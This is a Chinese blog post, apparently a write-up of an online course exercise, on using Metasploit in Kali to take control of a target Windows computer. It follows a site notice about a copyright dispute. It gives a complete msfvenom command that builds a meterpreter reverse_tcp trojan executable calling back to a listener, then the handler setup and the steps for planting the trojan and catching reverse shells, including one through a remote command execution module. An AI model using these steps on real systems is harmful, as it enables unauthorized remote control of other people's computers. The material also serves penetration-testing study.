当前位置 博文首页 > 文章内容

    利用Metasploit控制目标电脑

    作者:xiaoyu 栏目:Metasploit 时间:2020-10-02 9:00:51

    本站于2023年9月4日。收到“大连君*****咨询有限公司”通知
    说我们IIS7站长博客,有一篇博文用了他们的图片。
    要求我们给他们一张图片6000元。要不然法院告我们

    为避免不必要的麻烦,IIS7站长博客,全站内容图片下架、并积极应诉
    博文内容全部不再显示,请需要相关资讯的站长朋友到必应搜索。谢谢!

    另祝:版权碰瓷诈骗团伙,早日弃暗投明。

    相关新闻:借版权之名、行诈骗之实,周某因犯诈骗罪被判处有期徒刑十一年六个月

    叹!百花齐放的时代,渐行渐远!



      利用Metasploit控制目标电脑

      题记

      十月一回家干活,抽空把以前写的这篇文章整理下发出来,这个实验可能是我以后熟练使用kali的一个契机。

      注:此视频是我在腾讯课堂注册的一个网课,我照着课上做了一遍,成功控制目标主机。

      https://ke.qq.com/webcourse/index.html#cid=2898835&term_id=103143947&taid=10428356691245971&vid=5285890808159622204

      Metasploit框架介绍

      

      目录

      /usr/share/metasploit-framework/modules/

      

      进入metasploit

      命令:msfdb init:初始化数据库

      msfconsole:启动(启动后就进入msf命令行接口)

      输完上面2条命令之后可以输入db_status可以查看msf是否连接上数据库。

      

      Metasploit利用kali的nmap进行的端口扫描

      Msf生成木马

      

      多敲几遍自然而然就记住了。

      

      根据不同目标的系统生成不同的木马,木马在目标机器一执行就可以获取shell。

      msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.128 lport=7777 -f exe > abc.exe //在输入命令的地方生成一个存有本地ip与监听端口的abc.exe的木马文件,这里的木马是基于Windows系统的。

      

      给导弹加核弹头。

      

      新开一个窗口进入msf命令行模式,输入命令set payload windows/meterpreter/reverse_tcp。输入show options进行设置地址与监听端口。

      1、set lhost 本机ip,

      2、set lport 7777(生成木马的配置的端口号),

      3、run。

      

      然后把木马放到目标机器,启动后就会被控制进入到

      利用远程命令攻击windows实例

      

      攻击方法

      课上是利用远程命令执行漏洞。

      在msf里边调用其他模块,这个模块是生成可以拿到对方权限的一条命令,监听端口默认4444.

      关键内容设置好之后点run,复制生成的payload到页面执行后就拿到shell了。

      在sessions里面选择要使用的权限,这是获取的python的权限不是完整的权限。

      下面的截图是利用别的语言生成的拿权限代码,只要目标机器能执行,我们就能拿到权限。

      监听端口被占用后,就不能再用那个端口监听别人了,有几种方法。

      1、set lport 6666(使用别的端口)

      2、jobs -k 0(号要对应上,杀死这个任务)

      3、sessions -k 2(号对应上,杀死session)

     

      命令执行后,等待反弹shell即可。

      获取截图

      

      上传文件